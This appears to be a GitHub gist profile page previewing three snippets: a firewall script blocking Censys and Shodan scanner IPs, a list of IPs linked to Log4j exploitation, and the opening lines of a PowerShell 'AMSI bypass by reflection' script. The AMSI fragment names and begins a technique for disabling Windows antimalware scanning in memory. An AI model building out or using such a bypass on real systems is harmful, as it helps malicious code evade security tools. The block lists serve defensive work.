Skip to content

Instantly share code, notes, and snippets.

View GeorgePatsias's full-sized avatar
☠️

UserX GeorgePatsias

☠️
View GitHub Profile
@GeorgePatsias
GeorgePatsias / block_scanners.sh
Created November 20, 2025 16:06 — forked from s0ld13rr/block_scanners.sh
Script for Blocking Censys & Shodan IPs
#!/bin/bash
echo "[+] Installing scanners block rules with logging..."
LOGTAG="SCANNERS_BLOCK"
########################################
# Censys IPv4 ranges
########################################
CENSYS_V4=(
@GeorgePatsias
GeorgePatsias / log4j-malicious-ips.txt
Last active December 11, 2021 06:45
Log4J Malicious IPs - CVE-2021-44228
104.244.72.115
104.244.74.211
104.244.74.57
104.244.76.170
107.189.1.160
107.189.1.178
107.189.11.153
107.189.12.135
107.189.14.98
107.189.29.107
@GeorgePatsias
GeorgePatsias / AMSI_bypass_Reflection.ps1
Last active November 29, 2021 19:25 — forked from shantanu561993/AMSI_bypass_Reflection.ps1
AMSI Bypass by Reflection in memory
Write-Host "-- AMSI Patch"
Write-Host "-- Modified By: Shantanu Khandelwal (@shantanukhande)"
Write-Host "-- Original Author: Paul Laîné (@am0nsec)"
Write-Host ""
Class Hunter {
static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) {
while ($true) {
[int]$count = 0